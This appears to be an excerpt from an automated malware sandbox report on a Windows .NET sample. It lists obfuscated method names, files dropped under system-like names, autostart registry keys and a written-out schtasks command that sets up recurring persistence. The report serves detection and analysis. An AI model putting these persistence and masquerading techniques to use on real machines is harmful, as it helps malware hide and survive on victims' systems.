Source: m4n1AQRhaP.exe, xsl9dhMqK1WElLrrPFs.cs	High entropy of concatenated method names: 'HAyMQlqtpb', 'sfrMFQhq5J', 'j2PM1UhkE2', 'ULZMOcuUhx', 'BM9Ms5ArIT', 'YgIM3i5jJc', 'fppLuRiBJyWTQpTbwU2B', 'vmenNkiBvXBp9WvT2Fe0', 'eO6MaQiBMrGqnDoLObAs', 'GKrQudiBoHJ3RqxyiGBH'
Source: m4n1AQRhaP.exe, QRRm9bp7aYZuSp4bBre.cs	High entropy of concatenated method names: 'q1AE1eEKbh', 'jLLrQ7igvI8qPemTv4QC', 'DXdEHOigMcFnlWWWNtqD', 'l0ZsAOigoGMY6WwSRYsm', 'i5X', 'oZxpeCZLud', 'W93', 'L67', '_2PR', 'p6J'
Source: m4n1AQRhaP.exe, wCsp4uHXAZxyw245L7b.cs	High entropy of concatenated method names: 'NaEHQCpm15', 'aSiX0ei8j7DO8XI392Jb', 'eUG9x5i8CCj6F9RWHwe2', 'bwhL8Ai8YgATmOUlaGAY', 'bBWhfBi896p551fsHT5l', 'Ke6jJKi8wyH6oqJIe2kW', '_53Y', 'd65', 'Uyei5NWEkgE', 'YPQi5e0hcnD'
Source: m4n1AQRhaP.exe, X6kEemXMGhNALG2aJmh.cs	High entropy of concatenated method names: '_46E', 'd65', 'LHgXadBqAx', 'fanimh6Nts3', 'RDSi5d0rLjT', 'eunXBkdeOk', 'Niunpti8IKLSHWLp77fp', 'VfBjgki84ugOQFdKv2yk', 'PYRwgui83AOcbT2hid7m', 'RxZlbHi8ny4Nsp1PJE1w'
Source: m4n1AQRhaP.exe, PYOyPTmSZupKYHYyKWy.cs	High entropy of concatenated method names: 'OcKmMW4NPj', 'sYhmoeV8hu', 'RqTmawJkwT', 'S2hmBqARnr', 'y3UmZbnGy6', 'veGmlavGW3', 'oB4mzoWCFw', 'uJBSC6iL4bKb8hrFxi28', 'at2lI5iLnmAU2fXPZlas', 'zrKbDdiLIkvFejXicO3d'
Source: m4n1AQRhaP.exe, Hl18MKESQd3HC0VD4Nb.cs	High entropy of concatenated method names: '_25r', 'h65', 'a1hEgbjInl', 'WFDEfb2qv8', 'mVmEJssQTk', 'AWD', 'd78', 'A6v', 'dqG', 'M96'
Source: m4n1AQRhaP.exe, qHn7y3Hpx5xjm5EEBtB.cs	High entropy of concatenated method names: 'Yi3', 'hJSimEaTLqS', 'YaIHLSr7La', 'Oj4imLaFpml', 'g98Zf5ibXP3cGPiaJqyu', 'tqs64nibHqGuusD9UI0V', 'uBMse3ibcUPASM7ppenV', 'aGno5jibmu996SuSa5X9', 'kKOcJ3ibVk4hQZPlAawk', 'ciDpCRibquuBRWkBJyUK'
Source: m4n1AQRhaP.exe, JwtUhvFl4xYRXQ7sH0F.cs	High entropy of concatenated method names: 'Fnm1dQlhtf', 'rYw1is2lJQ', 'KBy1t9prLB', 'tbU1WgpbSu', 'X09159YoRT', 'DeMneniCAhX2cUmLRnxV', 't2OeJjiCWwXYA6He4SFr', 'pNJYWsiC5572lephfIgC', 'gQb2w4iCDOcNq2NT6bME', 'yRxPWFiCctp8wNDxlfDS'
Source: m4n1AQRhaP.exe, KSuHiGRFmKnTLWEF3kU.cs	High entropy of concatenated method names: 'SOtROfPxUF', 'KPQRsl5A7M', 'OdcR38PwFU', 'zPhfwEi0QmhZZURPH80s', 'bMrbDki0FQoWCe16I3IF', 'J5rT5Ki01Ao2cR2kp3px', 'yuoLaLi0O76pbEl8XwRi', 'zZEdtHi0sZZoJPmPFsjb', 'oJU15Ni038vpnnWIxBRT', 'HPbNOci0nMhchYYQTOQk'
Source: m4n1AQRhaP.exe, YxRVfDiC6UJZ4e3VePZ.cs	High entropy of concatenated method names: 'n39', 'V29', '_4yb', '_2Q4', 'p93', 'jV2imsv1UYj', 'u23iWgWM9lo', 'Ln6c1jiRcyLhFowLsdQw', 'UsSB4niRm3OcrTBfsFhe', 'qBl2gtiRX8n4lghxugyA'
Source: m4n1AQRhaP.exe, N7oau5ioYqRXeXIRERY.cs	High entropy of concatenated method names: 'io8', 'V29', 'j67', '_2Q4', 'pi9', 'XtUimnt01qS', 'u23iWgWM9lo', 'NXbDEqiRNpoQ83SMckhe', 'H143qTiRe5c5EgNyuawx', 'G2U7rOiRkWNl8aBdOY8h'
Source: m4n1AQRhaP.exe, OKjL8Ehbc2fXgg5TWsD.cs	High entropy of concatenated method names: 'bYKhu1UoUp', 'iishCmR5DO', 'PNuhYI2Mw0', 'qquhjhojI2', 'gcjh9syYja', 'vt2LtGiTRlVXFcpdCxVx', 'db0JQ9iTxBI2n4wFjGu5', 'cGjNIviThvMrB75JSbvv', 'zxXIVkiTyyBXnHHOaKeZ', 'v6MOM3iTK9OlB78cWbfw'
Source: m4n1AQRhaP.exe, HWFZlGthHmSrh5vTwtb.cs	High entropy of concatenated method names: 'O8OtCRSK5d', 'B4bqlCixQVVeShbnnErm', 'GN0fk4ixFowSsmekpZ78', 'sgLUhHixqGnjETxXqRVA', 'LaMAr5ix6QS3emqt5EpS', 'rTh8fKix1e6Y4AYuN8ey', 'h7T4r2ixOEF8wpSKRg9w', 'LZOtPFbtfK', 'PG8tpqE1DN', 'FbytEK5J2Y'
Source: m4n1AQRhaP.exe, B0twwKcpb59lpIG1cer.cs	High entropy of concatenated method names: 'qvtc08XIBk', 'OQTcSRP5aB', 'X3vcTDSyR3', 'tTvFS8iEUEyiVP1MkCxC', 'd7P9aoiE70cFb7M5krrR', 'xdtqPeiEIMLYBgHtMriS', 'BElCb0iE4AZv5CVYDpC3', 'ijhcLLLNXF', 'cdLc8BH2fO', 'lTTcbBaVJT'
Source: m4n1AQRhaP.exe, bFBObtX9BfapDu9gBBi.cs	High entropy of concatenated method names: 'IDV', 'd65', 'IjvimRvsBF4', 'RDSi5d0rLjT', 'BWjXG0AYP6', 'El1odTi8cBopE9VHrqLn', 'cgdmfDi8m6Jy413BS76a', 'I5YHuyi8XlW0JHr4eUD2', 'xjEJomi8HewEewC6ap0Q', 'SrhsCCi8VBEktfyrZ3QC'
Source: m4n1AQRhaP.exe, p8XUgU5C42ApmUoTgF5.cs	High entropy of concatenated method names: 'Te95TZFZJi', 'nJgjixi2r84em5rwtAlk', 'xNZ2Uoi284T0fmUZXZFM', 'DCLLbei2bLsGfuH2uxeM', 'hndOjQi2un22MyXNrgMM', 'BL55jSQWq6', 'aAE597ZaE2', 'w4M5w9niWR', 'up5NA5i2PIiTp1Ur7Mls', 'LPGjgIi2pvfRgbCZrJWA'
Source: m4n1AQRhaP.exe, puOJTTWS3aGif4OG976.cs	High entropy of concatenated method names: 'huhWJj0v8D', 'KvITclihxxiTMtZXskhL', 'm3FiOIihKYcdb6yxxcLP', 'EYAgReihR6f4jOcZWalm', 'tQl4JwihhxWqLCUSrnSS', 'whDWgbAh5D', 'lXCXXSih7x7nCwXqGVqU', 'gPWJDIihN7yE71OBt3Kv', 'lmaDTXihetwfOH8uOF2X', 'nhsNSVih4sLsNKX6pej5'
Source: m4n1AQRhaP.exe, rmlEf1vlgxi4Ag3KDas.cs	High entropy of concatenated method names: 'YhiMtWT69C', 'p3VMW6Xjxf', 'yPcXmJiBCVaZbgkpQUe0', 'aKQqG2iBY5MyBjOHKI5x', 'gE2gNPiBrU7p4VbsTsli', 'nWOOuTiBuNV4UVhoWprV', 'JRCfVliBjjSmahpho0fx', 'mGV6YWiB9ZWibVewwrwH', 'evwMd1xyX1', 'INahwiiBEZf8TfwkgWKn'
Source: m4n1AQRhaP.exe, g4k3FXhWyyqUIdrVcMk.cs	High entropy of concatenated method names: 'eewhApUm4O', 'j6YhDZeOf9', '_7Bm', 'mPLhciEf5B', 'AcOhm80Y26', 'vlGhXRTg5s', 's76hHJnF4D', 'iPCNXsiS9uQ3rvMCYwx7', 'PNU0eHiSY4vyKdXJQYEF', 'N9RgrwiSjZjBT3HJVl2Y'
Source: m4n1AQRhaP.exe, UW4urEtmDirmU2n9h5N.cs	High entropy of concatenated method names: 'wlqtHe4Mvo', 'Bi7tVt3WGn', 'LlVtq6753f', 'tuMePkiRrq67T6fml2l7', 't52j6UiRu4INJVPpNkwN', 'FBtxmeiRCYU65ZOm2JMX', 'LI9DlAiRYAjsfwFsKCE3', 'oVM6SniRjctVh7xO3d70', 'OCasGqiR9AqHFOHdvOPU', 'r6THNDiRw2Mms4pqQJLj'
Source: m4n1AQRhaP.exe, xwiPNbXKFKcBYQVZRfO.cs	High entropy of concatenated method names: '_71a', 'd65', 'NMMi5VsY6CD', 'wHDi5qxveT1', 'I81imyZ24hV', 'RDSi5d0rLjT', 'HNrBHKiLgMXPlv3P56Dl', 'cuvfIUiLf2jLuR5FE7sT', 'ji4V9fiLJQoTRiPxJyZa', 'dWgw3giLvZsnPD7YEN3W'
Source: m4n1AQRhaP.exe, F2fZvsDwyAMEyx39k4h.cs	High entropy of concatenated method names: 'LaIcdSK2EF', 'vThciv1KYQ', 'wJUctqvhoJ', 'CFrsnmipjyT8CX8We19l', 'QRL2f9ip96YjfeMAgli4', 'EYI8FEipC9QUOhP1gbu4', 'k6Vlc6ipYuKRLeKYrljG', 'bDtD0WBtID', 'QAcDSgCdmj', 'l0DDT8SJtB'
Source: m4n1AQRhaP.exe, ULkHpNQPbNjsH5BbTMk.cs	High entropy of concatenated method names: 'j9l', 'T4ZQEMHQgA', 'cXMQLiQHxN', 'tTlQ84kxQj', 'ui0QbGiDK2', 'B0SQrOHIC9', 'jrKQuHG8po', 'e5HIMfiuN3wBSBxWWUwe', 'iDLPpOiuUKy0QAOBONeo', 'uwcKpZiu7j7jtogI9QJe'
Source: m4n1AQRhaP.exe, ldrQgnfax5oqqu4RR0j.cs	High entropy of concatenated method names: '_7as', 'dxy', '_8Kv', 'mTqfZ5SqHt', 'fNafljIU0o', 'rENfzJvZCk', '_0023Nn', 'Dispose', 'unlNMZioMRGIklOaXB7g', 'T9mps5iooLyG1c1HY1vo'
Source: m4n1AQRhaP.exe, WkNJStVhvGt1NoJIAut.cs	High entropy of concatenated method names: 'g5H6nBhNVo', 'GOwlipiruk4wMBKOPoTO', 'VolrkMirb3iCA5gHCHxy', 'CNpNk2irr4UiURPObs33', 'mrCRWCirCLuh9lIjdsLQ', 'Fq8VPnquTr', 'UCnVpp0mwp', 'iUDVEuAgWT', 'cqXVLOZpY1', 'Be7V8ObMjU'
Source: m4n1AQRhaP.exe, nA2AswWLBswtneUPfHV.cs	High entropy of concatenated method names: 'ljuWbJGPXZ', 'oBmWrA0Gr7', 'QAYWuVvcOb', 'iJZWC7NZCl', 'dtpWYYfiPu', 'jZ3WjGHxEd', 'aveW9NbIQm', 'PofWw4tX71', 'SKeWG1gQar', 'PgPW0AVFbl'
Source: m4n1AQRhaP.exe, Il6tBucNZdwodjk3PtQ.cs	High entropy of concatenated method names: 'EtechLfBx0', 'jGC1IBiEXFXwdJ5O4IX7', 'PR4hOsiEHSyC4A3QMjRE', 'zRmUMIiEcg9Ibc4r6mfx', 'l11UNsiEmBXjbcRmOaDY', 'KrQckv0s71', 'WDinjCiEdrSHMHHtSaoi', 'fr6RfsiEiq8rugqSpZq5', 'eGqYAhiEtkDSZHb7tdNB', 'GvhFOEiEWdjcqk1lgLoo'
Source: m4n1AQRhaP.exe, vqgCZNRW9QfAmJdDdLN.cs	High entropy of concatenated method names: 'wctRAGMLys', 'U8VRDeD8gI', 'jwORcbLSsk', 'OjFRmfAwuJ', 'wtyRXZomjr', 'VoZitri0dKNvZEKACkPg', 'UiLw8Wi0ihPiG36AbUs7', 'kubxkgi0tyG42vCmeQvK', 'YbOaNji0WO1WpL4rBGSR', 'X2AsCIi05KFSZfmmNXWu'
Source: m4n1AQRhaP.exe, CdR9UMWHtnekxgntbNc.cs	High entropy of concatenated method names: 'ko7WqbKiG4', 'kVAW6eGu5E', 'fX3WQHJntE', 'zK4CHtixgCZcmku6hKGj', 'YmVpxeixfCTJPeNuYsXJ', 'wagH28ixS9HqCdlxM7Xr', 'vIX6fHixTsXkGjnhFCBj', 'rQjtPbixJhV6wRFhrxu8', 'dyPwjFixvfZJkFNIAAGC', 'WOI2EwixMmBaL2YwUhmt'
Source: m4n1AQRhaP.exe, UYNyH9PDHqPTKRtXDBk.cs	High entropy of concatenated method names: 'nrDkDeig8dTr8Tw2EP1b', 'qPgwm4igEKPxFCi8nTBl', 'NMxCqBigLeNDxq33hDRQ', 'M4xXM3igbSlYjbT9kUNv', 'f6xPmTCc4Q', '_1R8', '_3eK', 'pHLPXx492n', 'fePPHYN5hS', 'eDfPVR4mjl'
Source: m4n1AQRhaP.exe, L9lBqmgfTdt7mGMdWGR.cs	High entropy of concatenated method names: 'GVFimGyZPGb', 'wXNgv8FcnY', 'bL2gMEQtIW', 'qHugo1HOL4', 'GLL04liM8ZeHMeIlFOOn', 'PuiTsuiMbiqAJxSlrjqt', 'doFXpriMrlhtFjsShd4u', 'VlVXiFiMucoc47uMbjoE', 'FVDkceiMCmkRcNxBKFQO', 'OqoZUZiMYyq4bs04LB6q'
Source: m4n1AQRhaP.exe, INCsx6A6fCmxdElxcFw.cs	High entropy of concatenated method names: 'Wc7', 'k7S', '_37r', 'ewoim4Oj9kG', 'I8tiWz0heU7', 'CYu1LDiPiUOOYrI7I0gx', 'TYQsVniPtOxfX7LU10ch', 'IelTsMiPWrLgIhkKHfMM', 'rVpQ2IiP5J5KsFUiW0eL', 'WoRqbTiPAWnE9aIVcrXp'
Source: m4n1AQRhaP.exe, ckViN3DcabkT2U3MytR.cs	High entropy of concatenated method names: 'MfRDI6QMaO', 'CnPD4k3eAX', 'F4yDFFiPZ9giHH9xxfdg', 'xVp1XLiPabgWtflOeM0x', 'MBgHAGiPBU4vHg134CEY', 'CvEDssv7EY', 'D65D3Mk9U8', 'sisC8giPJwqW4DTk6JxG', 'mh8iSkiPvtdbnr8i5lmN', 't4EnCmiPMQqK0d9EjvPu'
Source: m4n1AQRhaP.exe, UhjuEV78MfH5PnFjiq4.cs	High entropy of concatenated method names: 'dWeKkAZKPY', 'pvQKyX1tpr', 'ARDb3ViGLtHmLdc64S51', 'e54rr8iGphLyvg2ZEYjE', 'FKTxQAiGEvyR5CY37aCu', 'Jddfm5iG8ZGe0DWF5L2Z', 'kUwlPqiGbDRdRwDYOvtR', 'qIZKPK9SO7', 'IoNQkTiGuIa8Tsq8Pxa1', 'ArKbrIiGCmXHbpeVe10l'

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops executables to the windows directory (C:\Windows) and starts them

Source: unknown	Executable created and started: C:\Windows\bcastdvr\uwTuxQS3V.exe
Source: C:\Windows\System32\cmd.exe	Executable created and started: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe
Source: unknown	Executable created and started: C:\Windows\IME\en-GB\Registry.exe

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

System file written: C:\Windows\System32\SecurityHealthSystray.exe

Jump to behavior

Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	File created: C:\Users\user\Desktop\rCwnUSpv.log	Jump to dropped file
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	File created: C:\Users\user\Desktop\ISkSYroH.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	File created: C:\Users\user\Desktop\qLTnEFIs.log	Jump to dropped file
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File created: C:\Users\user\Desktop\mgFxlINb.log	Jump to dropped file
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File created: C:\Users\user\Desktop\MilkDJCZ.log	Jump to dropped file
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	File created: C:\Users\user\Desktop\kSqObZEE.log	Jump to dropped file
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File created: C:\Recovery\upfc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File created: C:\Windows\IME\en-GB\Registry.exe	Jump to dropped file
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File created: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Jump to dropped file
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File created: C:\Users\user\Desktop\bJiZPSMv.log	Jump to dropped file
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File created: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File created: C:\Users\user\Desktop\paINcIrQ.log	Jump to dropped file
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File created: C:\Users\user\Desktop\ZzLYPzhu.log	Jump to dropped file
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	File created: C:\Users\user\Desktop\RBEiIUto.log	Jump to dropped file
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File created: C:\Windows\bcastdvr\uwTuxQS3V.exe	Jump to dropped file
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File created: C:\Users\user\Desktop\kmqOzLcc.log	Jump to dropped file
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	File created: C:\Users\user\Desktop\gXpxUtOK.log	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File created: C:\Windows\IME\en-GB\Registry.exe	Jump to dropped file
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File created: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File created: C:\Windows\bcastdvr\uwTuxQS3V.exe	Jump to dropped file

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File created: C:\Users\user\Desktop\mgFxlINb.log	Jump to dropped file
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File created: C:\Users\user\Desktop\MilkDJCZ.log	Jump to dropped file
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File created: C:\Users\user\Desktop\kmqOzLcc.log	Jump to dropped file
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File created: C:\Users\user\Desktop\bJiZPSMv.log	Jump to dropped file
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File created: C:\Users\user\Desktop\ZzLYPzhu.log	Jump to dropped file
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File created: C:\Users\user\Desktop\paINcIrQ.log	Jump to dropped file
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	File created: C:\Users\user\Desktop\rCwnUSpv.log	Jump to dropped file
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	File created: C:\Users\user\Desktop\kSqObZEE.log	Jump to dropped file
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	File created: C:\Users\user\Desktop\RBEiIUto.log	Jump to dropped file
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	File created: C:\Users\user\Desktop\ISkSYroH.log	Jump to dropped file
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	File created: C:\Users\user\Desktop\qLTnEFIs.log	Jump to dropped file
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	File created: C:\Users\user\Desktop\gXpxUtOK.log	Jump to dropped file

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run uwTuxQS3V

Jump to behavior

Creates an undocumented autostart registry key

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior

Creates multiple autostart registry keys

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iHstGpVMr4QFhc62UUbis	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Registry	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run upfc	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run uwTuxQS3V	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ikEtBZXIKU1m0Gn	Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 5 /tr "'C:\Recovery\upfc.exe'" /f

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run upfc	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run upfc	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run upfc	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run upfc	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iHstGpVMr4QFhc62UUbis	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iHstGpVMr4QFhc62UUbis	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iHstGpVMr4QFhc62UUbis	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iHstGpVMr4QFhc62UUbis	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run uwTuxQS3V	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run uwTuxQS3V	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run uwTuxQS3V	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run uwTuxQS3V	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ikEtBZXIKU1m0Gn	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ikEtBZXIKU1m0Gn	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Registry	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Registry	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Registry	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Registry	Jump to behavior

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
